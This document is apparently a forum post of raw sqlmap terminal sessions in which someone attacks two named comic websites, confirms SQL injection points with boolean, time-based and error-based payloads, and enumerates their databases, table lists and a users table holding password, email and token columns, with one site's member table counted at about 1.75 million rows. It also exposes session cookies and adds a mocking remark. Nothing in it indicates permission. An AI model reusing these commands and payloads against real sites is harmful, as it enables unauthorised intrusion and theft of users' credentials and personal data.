(myenv) root@cccc:~# sqlmap -u "https://demonicscans.org/advanced.php?genre[]=1&list=1&orderby=VIEWS%20DESC&status=all" \
  -p "genre[]" \
  --cookie="_lr_env_src_ats=false; _lr_retry_request=true; _sharedID=c81544cf-f36b-40e2-b29e-2a36f3872cf6; _sharedID_cst=zix7LPQsHA%3D%3D; _ym_uid=1757702728382004999; _ym_uid_cst=znv0HA%3D%3D; demon=56487; demonbll=1; demontemp=2c7bc3b2875611f0a06b; gz_page_depth=%7B%22last%22%3A%22https%3A%2F%2Fdemonicscans.org%2Fbookmarks.php%22%2C%22depth%22%3A3%7D; page_load_uuid=a68a32d3-279a-43e1-9477-3688908b4213; reacted_chap_100000002=5; reacted_chap_100000019=5; reacted_chap_100000023=2; reacted_chap_100000038=5; reacted_chap_100011851=5; reacted_chap_100012253=4; reacted_chap_100012779=5; subdemon=1; surfer_uuid=da156012-b183-4a2c-9398-e0d62d0a7f0e; useruid=uid-m7w8cbtfqi1757702932174" \
  --headers="X-Requested-With: XMLHttpRequest" \
  --referer="https://demonicscans.org/" \
  --dbms=mysql \
  --level=5 \
  --risk=3 \
  --batch
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9.1#dev}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:18:50 /2025-09-13/

[02:18:51] [INFO] testing connection to the target URL
[02:18:52] [INFO] checking if the target is protected by some kind of WAF/IPS
[02:18:54] [INFO] testing if the target URL content is stable
[02:18:55] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[02:18:56] [WARNING] heuristic (basic) test shows that GET parameter 'genre[]' might not be injectable
[02:18:56] [INFO] testing for SQL injection on GET parameter 'genre[]'
[02:18:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:18:58] [WARNING] reflective value(s) found and filtering out
[02:19:20] [INFO] GET parameter 'genre[]' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[02:19:20] [INFO] testing 'Generic inline queries'
[02:19:20] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[02:19:20] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[02:19:20] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[02:19:20] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[02:19:21] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[02:19:21] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[02:19:21] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[02:19:21] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[02:19:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:19:22] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:19:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:19:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:19:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:19:23] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:19:23] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:19:23] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[02:19:23] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[02:19:24] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:19:24] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[02:19:24] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[02:19:24] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[02:19:24] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[02:19:24] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:19:24] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[02:19:24] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[02:19:24] [INFO] testing 'MySQL inline queries'
[02:19:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[02:19:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[02:19:25] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[02:19:25] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[02:19:25] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[02:19:25] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[02:19:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:19:36] [INFO] GET parameter 'genre[]' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[02:19:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[02:19:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[02:19:37] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[02:19:38] [INFO] target URL appears to have 1 column in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
[02:19:42] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[02:19:47] [INFO] target URL appears to be UNION injectable with 1 columns
[02:19:47] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[02:19:52] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[02:19:56] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[02:20:00] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[02:20:04] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[02:20:07] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[02:20:10] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[02:20:14] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[02:20:17] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[02:20:21] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[02:20:27] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[02:20:31] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[02:20:35] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[02:20:38] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[02:20:42] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[02:20:46] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[02:20:49] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[02:20:52] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[02:20:56] [INFO] checking if the injection point on GET parameter 'genre[]' is a false positive
GET parameter 'genre[]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 528 HTTP(s) requests:
---
Parameter: genre[] (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: genre[]=1' AND 7842=7842-- CEIH&list=1&orderby=VIEWS DESC&status=all

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: genre[]=1' AND (SELECT 9955 FROM (SELECT(SLEEP(5)))lwOx)-- XCEh&list=1&orderby=VIEWS DESC&status=all
---
[02:21:03] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.19
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[02:21:04] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/demonicscans.org'

[*] ending @ 02:21:04 /2025-09-13/

[02:31:21] [INFO] retrieved: readmanganowadm_maindatabase
current database: 'readmanganowadm_maindatabase'

Database: readmanganowadm_maindatabase
[110 tables]
+----------------------------+
| EVENTS_REWARDS             |
| FEATURED                   |
| FIXMNG                     |
| INACTIVE_SPAMMERS          |
| events                     |
| groups                     |
| achievements               |
| achievements_track         |
| active_monsters            |
| active_monsters_attackers  |
| active_pvp                 |
| active_pvp_logs            |
| admins                     |
| alternatives               |
| attack_logs                |
| cards                      |
| categories                 |
| categorymanga              |
| categorynovel              |
| chapreactions              |
| chapserrors                |
| chapters                   |
| claimed_achievements       |
| classes                    |
| classes_skills             |
| collections                |
| collections_log            |
| comments                   |
| commentslikes              |
| contestall                 |
| crawldirect                |
| crawlsoucehost             |
| crawlsource                |
| crawlsourcenv              |
| crawlsourceraw             |
| dailyvar                   |
| dead_monsters_attackers    |
| entries                    |
| event_wave_map             |
| follow                     |
| game_updates               |
| gates                      |
| goblin_feast               |
| inventory                  |
| items                      |
| likess                     |
| live_chat                  |
| logchapsgroups             |
| logchapters                |
| loginlog                   |
| logpages                   |
| logread                    |
| loot_logs                  |
| mangalist                  |
| merchant                   |
| merchant_log               |
| merchant_user_quota        |
| monsters                   |
| monsters_loot              |
| monsters_rewards           |
| nchapters                  |
| nfollow                    |
| nlogchapters               |
| notifications              |
| novels                     |
| npages                     |
| nratings                   |
| orc_cull                   |
| orc_cull_state             |
| orders                     |
| pages                      |
| pets                       |
| pets_inventory             |
| pets_slots                 |
| pets_stages                |
| powers                     |
| profilepictures            |
| pvp_goals_log              |
| pvp_goals_rewards          |
| pvp_logs                   |
| pvp_points                 |
| pvp_ranking_rewards        |
| pvp_ranks                  |
| pvp_season                 |
| pvp_tier_rewards           |
| ratings                    |
| rchap                      |
| recipes                    |
| referrers                  |
| rewards                    |
| server_reset               |
| slots                      |
| stamina_cap                |
| stamina_farm               |
| subreports                 |
| updatedch                  |
| updatedcmntchp             |
| user_equipment             |
| user_equipment_deff        |
| user_pets                  |
| user_pets_def              |
| user_skills                |
| useradmin                  |
| userfollows                |
| users                      |
| usersplat                  |
| waves                      |
| waves_monsters             |
| weekly_damage              |
| weekly_leaderboard_rewards |
+----------------------------+

[02:56:22] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/demonicscans.org'

[*] ending @ 02:56:22 /2025-09-13/

Database: readmanganowadm_maindatabase
Table: users
[29 columns]
+------------------+--------------+
| Column           | Type         |
+------------------+--------------+
| LEVEL            | int(11)      |
| ATTACK           | int(11)      |
| CHAPSREAD        | int(11)      |
| CHAT_BAN         | int(11)      |
| CLASS            | int(11)      |
| CLASS_RANK       | int(11)      |
| DEFENSE          | int(11)      |
| EMAIL            | varchar(100) |
| GEMS             | int(11)      |
| GOLD             | int(11)      |
| ID               | int(11)      |
| LAST_ATTACK_TIME | datetime     |
| LUCK             | int(11)      |
| MAX_STAMINA      | int(11)      |
| NOADSDATE        | date         |
| PASSWORD         | varchar(100) |
| PICTURE          | varchar(200) |
| POINTS           | double       |
| PVP_COINS        | int(11)      |
| REGDATE          | date         |
| SHOWLATESTREAD   | varchar(20)  |
| STAMINA          | int(11)      |
| STAT_POINTS      | int(11)      |
| TOKEN            | varchar(50)  |
| USERNAME         | varchar(100) |
| usertoken        | varchar(100) |
| VERIFIED         | varchar(10)  |
| VERIFYCODE       | varchar(20)  |
| XP               | int(11)      |
+------------------+--------------+

[03:06:33] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/demonicscans.org'

[*] ending @ 03:06:33 /2025-09-13/
 
Gay boy cartoons )))) wtf :D lol

Database: bl_comic
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| qiswl_member | 1752753 |
+--------------+---------+



Code:
(myenv) root@E02S29:~# sqlmap -u "https://boylove.cc/home/index/dailyupdate1/weekday/*/page/2"   --cookie="PHPSESSID=17781a2d5a230d756cb625fad04a700c; _clck=aa2yzv%5E2%5Efza%5E0%5E2082; _clsk=vnu668%5E1757754974429%5E31%5E0%5Ee.clarity.ms%2Fcollect; autoSignRs=1; bulletin_new_31=1; dark=N; history=%5B%7B%22manhua_id%22%3A31373%2C%22manhua_title%22%3A%22%5Cu7070%5Cu70ec%5Cu503e%5Cu8986%5Cu4e4b%5Cu6d77%22%2C%22manhua_image%22%3A%22%5C%2Fbookimages%5C%2Fimg%5C%2F20250817%5C%2F8ead0a501585076c15615518f0accd6b.webp%22%2C%22manhua_type%22%3A1%2C%22manhua_vipcanread%22%3A0%7D%5D; lang=CN; returnOct=true; rfv=https%3A%2F%2Fboylove.cc%2Fhome%2Fbook%2Findex%2Fid%2F; shunt=3; todayBrowseDay=true; todayBrowseMonth=true; type=1"   --technique=E   --dbms=mysql   --level=5   --risk=3   --dbs --flush-session --batch
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9#pip}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:43:43 /2025-09-14/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[02:43:43] [INFO] flushing session file
[02:43:43] [INFO] testing connection to the target URL
[02:43:44] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[02:43:44] [INFO] checking if the target is protected by some kind of WAF/IPS
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
[02:43:55] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[02:43:56] [INFO] testing for SQL injection on URI parameter '#1*'
[02:43:56] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[02:44:15] [WARNING] reflective value(s) found and filtering out
[02:44:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[02:44:43] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[02:45:06] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[02:45:30] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[02:45:52] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[02:46:15] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[02:46:39] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[02:47:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:47:25] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:47:48] [INFO] testing 'MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:47:49] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:48:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:48:35] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:48:58] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:49:22] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:49:45] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[02:50:08] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
got a 302 redirect to 'https://boylove.cc/home/index/dailyupdate1'. Do you want to follow? [Y/n] Y
[02:50:21] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:50:28] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[02:50:28] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[02:50:28] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[02:50:28] [INFO] URI parameter '#1*' is 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 917 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
    Payload: https://boylove.cc/home/index/dailyupdate1/weekday/GTID_SUBSET(CONCAT(0x7171766a71,(SELECT (ELT(2720=2720,1))),0x71717a7071),2720)/page/2
---
[02:50:28] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[02:50:31] [INFO] fetching database names
[02:50:31] [INFO] retrieved: 'information_schema'
[02:50:31] [INFO] retrieved: 'bl_comic'
available databases [2]:
[*] bl_comic
[*] information_schema

[02:50:31] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 837 times
[02:50:31] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/boylove.cc'

[*] ending @ 02:50:31 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://boylove.cc/home/index/dailyupdate1/weekday/*/page/2"   --cookie="PHPSESSID=17781a2d5a230d756cb625fad04a700c; _clck=aa2yzv%5E2%5Efza%5E0%5E2082; _clsk=vnu668%5E1757754974429%5E31%5E0%5Ee.clarity.ms%2Fcollect; autoSignRs=1; bulletin_new_31=1; dark=N; history=%5B%7B%22manhua_id%22%3A31373%2C%22manhua_title%22%3A%22%5Cu7070%5Cu70ec%5Cu503e%5Cu8986%5Cu4e4b%5Cu6d77%22%2C%22manhua_image%22%3A%22%5C%2Fbookimages%5C%2Fimg%5C%2F20250817%5C%2F8ead0a501585076c15615518f0accd6b.webp%22%2C%22manhua_type%22%3A1%2C%22manhua_vipcanread%22%3A0%7D%5D; lang=CN; returnOct=true; rfv=https%3A%2F%2Fboylove.cc%2Fhome%2Fbook%2Findex%2Fid%2F; shunt=3; todayBrowseDay=true; todayBrowseMonth=true; type=1"   --technique=E   --dbms=mysql   --level=5   --risk=3   --batch -D bl_comic --tables
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9#pip}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:51:12 /2025-09-14/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[02:51:12] [INFO] testing connection to the target URL
[02:51:13] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
    Payload: https://boylove.cc/home/index/dailyupdate1/weekday/GTID_SUBSET(CONCAT(0x7171766a71,(SELECT (ELT(2720=2720,1))),0x71717a7071),2720)/page/2
---
[02:51:13] [INFO] testing MySQL
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
[02:51:13] [INFO] confirming MySQL
[02:51:14] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[02:51:14] [INFO] fetching tables for database: 'bl_comic'
[02:51:15] [INFO] retrieved: 'qiswl_aa_test'
[02:51:15] [INFO] retrieved: 'qiswl_ad_group'
[02:51:15] [INFO] retrieved: 'qiswl_admin_user'
[02:51:16] [INFO] retrieved: 'qiswl_adopt'
[02:51:16] [INFO] retrieved: 'qiswl_ads'
[02:51:16] [INFO] retrieved: 'qiswl_ads_color_text'
[02:51:16] [INFO] retrieved: 'qiswl_app_setting'
[02:51:16] [INFO] retrieved: 'qiswl_article'
[02:51:17] [INFO] retrieved: 'qiswl_article_comment'
[02:51:17] [INFO] retrieved: 'qiswl_article_comment_thumbs'
[02:51:17] [INFO] retrieved: 'qiswl_article_comment_thumbs_down'
[02:51:17] [INFO] retrieved: 'qiswl_article_thumbs'
[02:51:17] [INFO] retrieved: 'qiswl_audit_tags_log'
[02:51:17] [INFO] retrieved: 'qiswl_auth_group'
[02:51:18] [INFO] retrieved: 'qiswl_auth_group_access'
[02:51:18] [INFO] retrieved: 'qiswl_auth_menus'
[02:51:18] [INFO] retrieved: 'qiswl_auth_rule'
[02:51:18] [INFO] retrieved: 'qiswl_avator'
[02:51:18] [INFO] retrieved: 'qiswl_badkey'
[02:51:19] [INFO] retrieved: 'qiswl_banner'
[02:51:19] [INFO] retrieved: 'qiswl_blacklist'
[02:51:19] [INFO] retrieved: 'qiswl_browse_count'
[02:51:19] [INFO] retrieved: 'qiswl_capter'
[02:51:19] [INFO] retrieved: 'qiswl_capter_zip'
[02:51:20] [INFO] retrieved: 'qiswl_category'
[02:51:20] [INFO] retrieved: 'qiswl_config'
[02:51:20] [INFO] retrieved: 'qiswl_convert_schedule'
[02:51:20] [INFO] retrieved: 'qiswl_deleted_image'
[02:51:20] [INFO] retrieved: 'qiswl_distribution'
[02:51:21] [INFO] retrieved: 'qiswl_diyu'
[02:51:21] [INFO] retrieved: 'qiswl_duzhequn'
[02:51:21] [INFO] retrieved: 'qiswl_event'
[02:51:21] [INFO] retrieved: 'qiswl_event_avator'
[02:51:21] [INFO] retrieved: 'qiswl_event_cw_member_word'
[02:51:21] [INFO] retrieved: 'qiswl_event_time'
[02:51:22] [INFO] retrieved: 'qiswl_eventq'
[02:51:22] [INFO] retrieved: 'qiswl_eventq_result'
[02:51:22] [INFO] retrieved: 'qiswl_exec_each_time'
[02:51:22] [INFO] retrieved: 'qiswl_feedback'
[02:51:22] [INFO] retrieved: 'qiswl_feedback_item'
[02:51:23] [INFO] retrieved: 'qiswl_feedback_navi'
[02:51:23] [INFO] retrieved: 'qiswl_fenrun'
[02:51:23] [INFO] retrieved: 'qiswl_game_categories'
[02:51:23] [INFO] retrieved: 'qiswl_game_item'
[02:51:23] [INFO] retrieved: 'qiswl_game_uid'
[02:51:23] [INFO] retrieved: 'qiswl_games'
[02:51:24] [INFO] retrieved: 'qiswl_games_event'
[02:51:24] [INFO] retrieved: 'qiswl_history'
[02:51:24] [INFO] retrieved: 'qiswl_indexlist'
[02:51:24] [INFO] retrieved: 'qiswl_indexmarquee'
[02:51:24] [INFO] retrieved: 'qiswl_kuangren'
[02:51:25] [INFO] retrieved: 'qiswl_lanmu'
[02:51:25] [INFO] retrieved: 'qiswl_level_area'
[02:51:25] [INFO] retrieved: 'qiswl_logo'
[02:51:25] [INFO] retrieved: 'qiswl_manhua'
[02:51:25] [INFO] retrieved: 'qiswl_manhua_audit_tags'
[02:51:25] [INFO] retrieved: 'qiswl_manhua_comment'
[02:51:26] [INFO] retrieved: 'qiswl_manhua_comment_thumbs'
[02:51:26] [INFO] retrieved: 'qiswl_manhua_comment_thumbs_down'
[02:51:26] [INFO] retrieved: 'qiswl_manhua_dlsite'
[02:51:26] [INFO] retrieved: 'qiswl_member'
[02:51:26] [INFO] retrieved: 'qiswl_member_chapter'
[02:51:26] [INFO] retrieved: 'qiswl_member_comment_notice'
[02:51:27] [INFO] retrieved: 'qiswl_member_exp_rec'
[02:51:27] [INFO] retrieved: 'qiswl_member_gold_rec'
[02:51:27] [INFO] retrieved: 'qiswl_member_last_login'
[02:51:27] [INFO] retrieved: 'qiswl_member_notice'
[02:51:27] [INFO] retrieved: 'qiswl_member_point'
[02:51:28] [INFO] retrieved: 'qiswl_member_prize_list'
[02:51:28] [INFO] retrieved: 'qiswl_member_statistics'
[02:51:28] [INFO] retrieved: 'qiswl_member_sticker_set'
[02:51:28] [INFO] retrieved: 'qiswl_member_test_regist'
[02:51:28] [INFO] retrieved: 'qiswl_member_viplog'
[02:51:28] [INFO] retrieved: 'qiswl_milktea_item'
[02:51:29] [INFO] retrieved: 'qiswl_notice'
[02:51:29] [INFO] retrieved: 'qiswl_order'
[02:51:29] [INFO] retrieved: 'qiswl_order2'
[02:51:29] [INFO] retrieved: 'qiswl_ovh_chid'
[02:51:29] [INFO] retrieved: 'qiswl_payment'
[02:51:29] [INFO] retrieved: 'qiswl_prize_type'
[02:51:30] [INFO] retrieved: 'qiswl_pro'
[02:51:30] [INFO] retrieved: 'qiswl_record'
[02:51:30] [INFO] retrieved: 'qiswl_scratch_list'
[02:51:30] [INFO] retrieved: 'qiswl_scratch_rec'
[02:51:30] [INFO] retrieved: 'qiswl_sign'
[02:51:31] [INFO] retrieved: 'qiswl_sticker'
[02:51:31] [INFO] retrieved: 'qiswl_sticker_set'
[02:51:31] [INFO] retrieved: 'qiswl_store_class'
[02:51:31] [INFO] retrieved: 'qiswl_store_class_sub'
[02:51:31] [INFO] retrieved: 'qiswl_store_item'
[02:51:32] [INFO] retrieved: 'qiswl_subscribe'
[02:51:32] [INFO] retrieved: 'qiswl_system_error_log'
[02:51:32] [INFO] retrieved: 'qiswl_system_login_log'
[02:51:32] [INFO] retrieved: 'qiswl_system_operation_log'
[02:51:32] [INFO] retrieved: 'qiswl_system_skin'
[02:51:32] [INFO] retrieved: 'qiswl_task'
[02:51:33] [INFO] retrieved: 'qiswl_task_event_record'
[02:51:33] [INFO] retrieved: 'qiswl_task_record'
[02:51:33] [INFO] retrieved: 'qiswl_ticai'
[02:51:33] [INFO] retrieved: 'qiswl_tixian'
[02:51:33] [INFO] retrieved: 'qiswl_tuibo'
[02:51:34] [INFO] retrieved: 'qiswl_tuibo_message'
[02:51:34] [INFO] retrieved: 'qiswl_tuibo_stat'
[02:51:34] [INFO] retrieved: 'qiswl_update_log'
Database: bl_comic
[104 tables]
+-----------------------------------+
| qiswl_aa_test                     |
| qiswl_ad_group                    |
| qiswl_admin_user                  |
| qiswl_adopt                       |
| qiswl_ads                         |
| qiswl_ads_color_text              |
| qiswl_app_setting                 |
| qiswl_article                     |
| qiswl_article_comment             |
| qiswl_article_comment_thumbs      |
| qiswl_article_comment_thumbs_down |
| qiswl_article_thumbs              |
| qiswl_audit_tags_log              |
| qiswl_auth_group                  |
| qiswl_auth_group_access           |
| qiswl_auth_menus                  |
| qiswl_auth_rule                   |
| qiswl_avator                      |
| qiswl_badkey                      |
| qiswl_banner                      |
| qiswl_blacklist                   |
| qiswl_browse_count                |
| qiswl_capter                      |
| qiswl_capter_zip                  |
| qiswl_category                    |
| qiswl_config                      |
| qiswl_convert_schedule            |
| qiswl_deleted_image               |
| qiswl_distribution                |
| qiswl_diyu                        |
| qiswl_duzhequn                    |
| qiswl_event                       |
| qiswl_event_avator                |
| qiswl_event_cw_member_word        |
| qiswl_event_time                  |
| qiswl_eventq                      |
| qiswl_eventq_result               |
| qiswl_exec_each_time              |
| qiswl_feedback                    |
| qiswl_feedback_item               |
| qiswl_feedback_navi               |
| qiswl_fenrun                      |
| qiswl_game_categories             |
| qiswl_game_item                   |
| qiswl_game_uid                    |
| qiswl_games                       |
| qiswl_games_event                 |
| qiswl_history                     |
| qiswl_indexlist                   |
| qiswl_indexmarquee                |
| qiswl_kuangren                    |
| qiswl_lanmu                       |
| qiswl_level_area                  |
| qiswl_logo                        |
| qiswl_manhua                      |
| qiswl_manhua_audit_tags           |
| qiswl_manhua_comment              |
| qiswl_manhua_comment_thumbs       |
| qiswl_manhua_comment_thumbs_down  |
| qiswl_manhua_dlsite               |
| qiswl_member                      |
| qiswl_member_chapter              |
| qiswl_member_comment_notice       |
| qiswl_member_exp_rec              |
| qiswl_member_gold_rec             |
| qiswl_member_last_login           |
| qiswl_member_notice               |
| qiswl_member_point                |
| qiswl_member_prize_list           |
| qiswl_member_statistics           |
| qiswl_member_sticker_set          |
| qiswl_member_test_regist          |
| qiswl_member_viplog               |
| qiswl_milktea_item                |
| qiswl_notice                      |
| qiswl_order                       |
| qiswl_order2                      |
| qiswl_ovh_chid                    |
| qiswl_payment                     |
| qiswl_prize_type                  |
